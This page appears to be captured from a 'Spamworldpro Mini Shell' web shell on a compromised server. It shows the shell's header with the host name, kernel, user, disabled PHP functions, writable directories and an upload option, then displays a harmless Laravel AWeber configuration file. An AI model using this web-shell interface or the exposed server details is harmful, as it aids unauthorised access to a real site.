Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/demo.cartinsight.co/vendor/codegreencreative/laravel-aweber/config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/demo.cartinsight.co/vendor/codegreencreative/laravel-aweber/config/aweber.php
<?php

/*
|--------------------------------------------------------------------------
| Aweber configuration file
|--------------------------------------------------------------------------
|
| Use this file to configure Aweber package to work for you
|
| Create your Aweber Lab account and apps here: https://labs.aweber.com/apps
|
 */

return [
    /*
    |--------------------------------------------------------------------------
    | Account ID
    |--------------------------------------------------------------------------
    |
    | account_id is the account ID of the default Aweber account.
    |
    */
    'account_id' => env('AWEBER_ACCOUNT_ID', null),

    /*
    |--------------------------------------------------------------------------
    | Client ID
    |--------------------------------------------------------------------------
    |
    | client_id is the Client ID listed in your developer account. It uniquely
    | identifies your integration to AWeber.
    |
    */
    'client_id' => env('AWEBER_CLIENT_ID', null),

    /*
    |--------------------------------------------------------------------------
    | Client Secret
    |--------------------------------------------------------------------------
    |
    | Client secret found in your Aweber labs account for your app. It is the
    | client secret of the application.
    |
    */
    'client_secret' => env('AWEBER_CLIENT_SECRET', null),

    /*
    |--------------------------------------------------------------------------
    | Aweber account token key
    |--------------------------------------------------------------------------
    |
    | Account token key
    |
    */
    'token_key' => env('AWEBER_TOKEN_KEY', null),

    /*
    |--------------------------------------------------------------------------
    | Aweber account token secret
    |--------------------------------------------------------------------------
    |
    | Account token secret
    |
    */
    'token_secret' => env('AWEBER_TOKEN_SECRET', null),

    /*
    |--------------------------------------------------------------------------
    | Scopes
    |--------------------------------------------------------------------------
    |
    | When you authorize an OAuth integration you are required to tell AWeber
    | what sorts of things your integration will need access to. These are called
    | scopes.
    |
    */
    'scopes' => [
        'account.read',
        'list.read',
        'list.write',
        'subscriber.read',
        'subscriber.write',
        'email.read',
        'email.write',
        'subscriber.read-extended',
    ],

    /*
    |--------------------------------------------------------------------------
    | Cache
    |--------------------------------------------------------------------------
    |
    | The caching system used to store the access and refresh token received
    | from Aweber
    |
    */
    'cache' => env('AWEBER_CACHE', env('CACHE_DRIVER')),

    /*
    |--------------------------------------------------------------------------
    | Allow Empty
    |--------------------------------------------------------------------------
    |
    | Allow empty responses from Aweber.
    | If false, an exception may be thrown when Aweber responds
    | If true, no exception will be thrown when an Aweber response is empty
    |
     */
    'allow_empty' => env('AWEBER_ALLOW_EMPTY', true),
];

Spamworldpro Mini